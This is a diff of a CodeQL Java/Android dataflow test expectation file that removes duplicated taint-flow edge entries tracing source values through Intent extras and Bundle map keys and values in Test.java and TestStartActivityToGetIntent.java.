@@ -1313,26 +1011,18 @@ edges | Test.java:867:44:867:51 | source(...) : String | Test.java:28:29:28:36 | k : String | provenance | | | Test.java:867:44:867:51 | source(...) : String | Test.java:867:24:867:52 | newBundleWithMapKey(...) : Bundle [] : String | provenance | MaD:105 | | Test.java:868:4:868:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | Test.java:869:36:869:38 | out : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:868:4:868:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | Test.java:869:36:869:38 | out : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:868:22:868:23 | in : Bundle [] : String | Test.java:868:4:868:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:65 | | Test.java:868:22:868:23 | in : Bundle [] : String | Test.java:868:4:868:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:65 | | Test.java:869:19:869:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | provenance | | | Test.java:869:19:869:39 | getIntent_extras(...) : Bundle [] : String | Test.java:869:9:869:40 | getMapKey(...) | provenance | MaD:98 | | Test.java:869:36:869:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:869:36:869:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:869:36:869:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:869:19:869:39 | getIntent_extras(...) : Bundle [] : String | provenance | MaD:34 | | Test.java:869:36:869:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:869:19:869:39 | getIntent_extras(...) 
: Bundle [] : String | provenance | MaD:34 | | Test.java:874:16:874:54 | (...)... : Bundle [] : Object | Test.java:875:22:875:23 | in : Bundle [] : Object | provenance | | | Test.java:874:24:874:54 | newBundleWithMapValue(...) : Bundle [] : Object | Test.java:874:16:874:54 | (...)... : Bundle [] : Object | provenance | | | Test.java:874:46:874:53 | source(...) : Object | Test.java:874:24:874:54 | newBundleWithMapValue(...) : Bundle [] : Object | provenance | MaD:176 | | Test.java:875:4:875:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | Test.java:876:38:876:40 | out : Intent [android.content.Intent.extras, ] : Object | provenance | | -| Test.java:875:4:875:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | Test.java:876:38:876:40 | out : Intent [android.content.Intent.extras, ] : Object | provenance | | -| Test.java:875:22:875:23 | in : Bundle [] : Object | Test.java:875:4:875:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | provenance | MaD:66 | | Test.java:875:22:875:23 | in : Bundle [] : Object | Test.java:875:4:875:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | provenance | MaD:66 | | Test.java:876:21:876:41 | getIntent_extras(...) : Bundle [] : Object | Test.java:876:9:876:42 | getMapValue(...) | provenance | MaD:175 | | Test.java:876:38:876:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | provenance | | -| Test.java:876:38:876:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | provenance | | -| Test.java:876:38:876:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:876:21:876:41 | getIntent_extras(...) 
: Bundle [] : Object | provenance | MaD:34 | | Test.java:876:38:876:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:876:21:876:41 | getIntent_extras(...) : Bundle [] : Object | provenance | MaD:34 | | Test.java:881:16:881:31 | (...)... : Intent | Test.java:882:10:882:11 | in : Intent | provenance | | | Test.java:881:24:881:31 | source(...) : Object | Test.java:881:16:881:31 | (...)... : Intent | provenance | | 
@@ -1344,27 +1034,19 @@ edges | Test.java:888:65:888:72 | source(...) : String | Test.java:28:29:28:36 | k : String | provenance | | | Test.java:888:65:888:72 | source(...) : String | Test.java:888:45:888:73 | newBundleWithMapKey(...) : Bundle [] : String | provenance | MaD:105 | | Test.java:889:4:889:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | Test.java:890:36:890:38 | out : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:889:4:889:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | Test.java:890:36:890:38 | out : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:889:22:889:23 | in : Intent [android.content.Intent.extras, ] : String | Test.java:889:4:889:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:68 | | Test.java:889:22:889:23 | in : Intent [android.content.Intent.extras, ] : String | Test.java:889:4:889:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:68 | | Test.java:890:19:890:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | provenance | | | Test.java:890:19:890:39 | getIntent_extras(...) : Bundle [] : String | Test.java:890:9:890:40 | getMapKey(...) | provenance | MaD:98 | | Test.java:890:36:890:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:890:36:890:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | provenance | | -| Test.java:890:36:890:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:890:19:890:39 | getIntent_extras(...) 
: Bundle [] : String | provenance | MaD:34 | | Test.java:890:36:890:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:890:19:890:39 | getIntent_extras(...) : Bundle [] : String | provenance | MaD:34 | | Test.java:895:16:895:76 | (...)... : Intent [android.content.Intent.extras, ] : Object | Test.java:896:22:896:23 | in : Intent [android.content.Intent.extras, ] : Object | provenance | | | Test.java:895:24:895:76 | newWithIntent_extras(...) : Intent [android.content.Intent.extras, ] : Object | Test.java:895:16:895:76 | (...)... : Intent [android.content.Intent.extras, ] : Object | provenance | | | Test.java:895:45:895:75 | newBundleWithMapValue(...) : Bundle [] : Object | Test.java:895:24:895:76 | newWithIntent_extras(...) : Intent [android.content.Intent.extras, ] : Object | provenance | MaD:178 | | Test.java:895:67:895:74 | source(...) : Object | Test.java:895:45:895:75 | newBundleWithMapValue(...) : Bundle [] : Object | provenance | MaD:176 | | Test.java:896:4:896:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | Test.java:897:38:897:40 | out : Intent [android.content.Intent.extras, ] : Object | provenance | | -| Test.java:896:4:896:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | Test.java:897:38:897:40 | out : Intent [android.content.Intent.extras, ] : Object | provenance | | -| Test.java:896:22:896:23 | in : Intent [android.content.Intent.extras, ] : Object | Test.java:896:4:896:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | provenance | MaD:69 | | Test.java:896:22:896:23 | in : Intent [android.content.Intent.extras, ] : Object | Test.java:896:4:896:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | provenance | MaD:69 | | Test.java:897:21:897:41 | getIntent_extras(...) : Bundle [] : Object | Test.java:897:9:897:42 | getMapValue(...) 
| provenance | MaD:175 | | Test.java:897:38:897:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | provenance | | -| Test.java:897:38:897:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | provenance | | -| Test.java:897:38:897:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:897:21:897:41 | getIntent_extras(...) : Bundle [] : Object | provenance | MaD:34 | | Test.java:897:38:897:40 | out : Intent [android.content.Intent.extras, ] : Object | Test.java:897:21:897:41 | getIntent_extras(...) : Bundle [] : Object | provenance | MaD:34 | | Test.java:902:16:902:31 | (...)... : Intent | Test.java:903:10:903:11 | in : Intent | provenance | | | Test.java:902:24:902:31 | source(...) : Object | Test.java:902:16:902:31 | (...)... : Intent | provenance | | 
@@ -2001,430 +1683,164 @@ edges | Test.java:1759:4:1759:6 | out [post update] : Intent | Test.java:1760:9:1760:11 | out | provenance | | | Test.java:1759:19:1759:20 | in : String | Test.java:1759:4:1759:6 | out [post update] : Intent | provenance | MaD:89 | | TestStartActivityToGetIntent.java:18:13:18:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:19:31:19:36 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:18:13:18:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:19:31:19:36 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:18:13:18:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:19:31:19:36 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:18:37:18:64 | (...)... : String | TestStartActivityToGetIntent.java:18:13:18:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | -| TestStartActivityToGetIntent.java:18:37:18:64 | (...)... : String | TestStartActivityToGetIntent.java:18:13:18:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:18:37:18:64 | (...)... : String | TestStartActivityToGetIntent.java:18:13:18:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:18:46:18:64 | source(...) : Object | TestStartActivityToGetIntent.java:18:37:18:64 | (...)... : String | provenance | | | TestStartActivityToGetIntent.java:19:31:19:36 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) 
: Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:19:31:19:36 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:19:31:19:36 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:23:13:23:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:24:46:24:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:23:13:23:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:24:46:24:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:23:13:23:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:24:46:24:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:23:37:23:69 | (...)... : String | TestStartActivityToGetIntent.java:23:13:23:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | -| TestStartActivityToGetIntent.java:23:37:23:69 | (...)... : String | TestStartActivityToGetIntent.java:23:13:23:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:23:37:23:69 | (...)... 
: String | TestStartActivityToGetIntent.java:23:13:23:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:23:46:23:69 | source(...) : Object | TestStartActivityToGetIntent.java:23:37:23:69 | (...)... : String | provenance | | | TestStartActivityToGetIntent.java:24:32:24:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:25:33:25:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:24:32:24:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:25:33:25:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:24:32:24:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:25:33:25:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:24:46:24:51 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:24:32:24:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:24:46:24:51 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:24:32:24:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:24:46:24:51 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:24:32:24:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:25:33:25:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) 
: Intent [android.content.Intent.extras, ] : String | provenance | android.content.Activity.startActivities()+TestStartActivityToGetIntent$SomeActivity | -| TestStartActivityToGetIntent.java:25:33:25:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | android.content.Activity.startActivities()+TestStartActivityToGetIntent$SomeActivity | -| TestStartActivityToGetIntent.java:25:33:25:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | android.content.Activity.startActivities()+TestStartActivityToGetIntent$SomeActivity | | TestStartActivityToGetIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:30:46:30:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:30:46:30:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:30:46:30:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:29:37:29:71 | (...)... : String | TestStartActivityToGetIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | -| TestStartActivityToGetIntent.java:29:37:29:71 | (...)... 
: String | TestStartActivityToGetIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:29:37:29:71 | (...)... : String | TestStartActivityToGetIntent.java:29:13:29:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:29:46:29:71 | source(...) : Object | TestStartActivityToGetIntent.java:29:37:29:71 | (...)... : String | provenance | | | TestStartActivityToGetIntent.java:30:32:30:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:31:33:31:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:30:32:30:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:31:33:31:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:30:32:30:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:31:33:31:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:30:46:30:51 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:30:32:30:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:30:46:30:51 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:30:32:30:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:30:46:30:51 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:30:32:30:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | | 
TestStartActivityToGetIntent.java:31:33:31:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:102:18:102:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | android.content.Activity.startActivities()+TestStartActivityToGetIntent$AnotherActivity | -| TestStartActivityToGetIntent.java:31:33:31:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:102:18:102:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | android.content.Activity.startActivities()+TestStartActivityToGetIntent$AnotherActivity | -| TestStartActivityToGetIntent.java:31:33:31:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:102:18:102:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | android.content.Activity.startActivities()+TestStartActivityToGetIntent$AnotherActivity | | TestStartActivityToGetIntent.java:35:13:35:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:36:31:36:36 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:35:13:35:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:36:31:36:36 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:35:13:35:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:36:31:36:36 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:35:37:35:64 | (...)... 
: String | TestStartActivityToGetIntent.java:35:13:35:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | -| TestStartActivityToGetIntent.java:35:37:35:64 | (...)... : String | TestStartActivityToGetIntent.java:35:13:35:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:35:37:35:64 | (...)... : String | TestStartActivityToGetIntent.java:35:13:35:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:35:46:35:64 | source(...) : Object | TestStartActivityToGetIntent.java:35:37:35:64 | (...)... : String | provenance | | | TestStartActivityToGetIntent.java:36:31:36:36 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:36:31:36:36 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:36:31:36:36 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) 
: Intent [android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:40:13:40:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:41:46:41:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:40:13:40:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:41:46:41:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:40:13:40:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:41:46:41:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:40:37:40:69 | (...)... : String | TestStartActivityToGetIntent.java:40:13:40:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | -| TestStartActivityToGetIntent.java:40:37:40:69 | (...)... : String | TestStartActivityToGetIntent.java:40:13:40:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:40:37:40:69 | (...)... : String | TestStartActivityToGetIntent.java:40:13:40:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:40:46:40:69 | source(...) : Object | TestStartActivityToGetIntent.java:40:37:40:69 | (...)... 
: String | provenance | | | TestStartActivityToGetIntent.java:41:32:41:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:42:33:42:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:41:32:41:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:42:33:42:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:41:32:41:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:42:33:42:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:41:46:41:51 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:41:32:41:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:41:46:41:51 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:41:32:41:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:41:46:41:51 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:41:32:41:52 | {...} : Intent[] [[], android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:42:33:42:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) 
: Intent [android.content.Intent.extras, ] : String | provenance | android.content.Activity.startActivities()+TestStartActivityToGetIntent$SomeActivity | -| TestStartActivityToGetIntent.java:42:33:42:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | android.content.Activity.startActivities()+TestStartActivityToGetIntent$SomeActivity | -| TestStartActivityToGetIntent.java:42:33:42:39 | intents : Intent[] [[], android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | android.content.Activity.startActivities()+TestStartActivityToGetIntent$SomeActivity | | TestStartActivityToGetIntent.java:52:13:52:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:53:40:53:45 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:52:13:52:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:53:40:53:45 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:52:13:52:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:53:40:53:45 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:52:37:52:71 | (...)... : String | TestStartActivityToGetIntent.java:52:13:52:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | -| TestStartActivityToGetIntent.java:52:37:52:71 | (...)... 
: String | TestStartActivityToGetIntent.java:52:13:52:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:52:37:52:71 | (...)... : String | TestStartActivityToGetIntent.java:52:13:52:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:52:46:52:71 | source(...) : Object | TestStartActivityToGetIntent.java:52:37:52:71 | (...)... : String | provenance | | | TestStartActivityToGetIntent.java:53:40:53:45 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:53:40:53:45 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:53:40:53:45 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) 
: Intent [android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:57:13:57:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:58:39:58:44 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:57:13:57:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:58:39:58:44 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:57:13:57:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:58:39:58:44 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:57:37:57:70 | (...)... : String | TestStartActivityToGetIntent.java:57:13:57:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | -| TestStartActivityToGetIntent.java:57:37:57:70 | (...)... : String | TestStartActivityToGetIntent.java:57:13:57:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:57:37:57:70 | (...)... : String | TestStartActivityToGetIntent.java:57:13:57:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:57:46:57:70 | source(...) : Object | TestStartActivityToGetIntent.java:57:37:57:70 | (...)... : String | provenance | | | TestStartActivityToGetIntent.java:58:39:58:44 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) 
: Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:58:39:58:44 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:58:39:58:44 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:62:13:62:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:63:43:63:48 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:62:13:62:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:63:43:63:48 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:62:13:62:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:63:43:63:48 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:62:37:62:69 | (...)... : String | TestStartActivityToGetIntent.java:62:13:62:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | -| TestStartActivityToGetIntent.java:62:37:62:69 | (...)... : String | TestStartActivityToGetIntent.java:62:13:62:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:62:37:62:69 | (...)... 
: String | TestStartActivityToGetIntent.java:62:13:62:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | provenance | MaD:49 | | TestStartActivityToGetIntent.java:62:46:62:69 | source(...) : Object | TestStartActivityToGetIntent.java:62:37:62:69 | (...)... : String | provenance | | | TestStartActivityToGetIntent.java:63:43:63:48 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:63:43:63:48 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:63:43:63:48 | intent : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:95:18:95:28 | getIntent(...) : Intent [android.content.Intent.extras, ] : String | provenance | | | TestStartActivityToGetIntent.java:67:13:67:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:68:46:68:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:67:13:67:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:68:46:68:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:67:13:67:18 | intent [post update] : Intent [android.content.Intent.extras, ] : String | TestStartActivityToGetIntent.java:68:46:68:51 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartActivityToGetIntent.java:67:37:67:71 | (...)... 
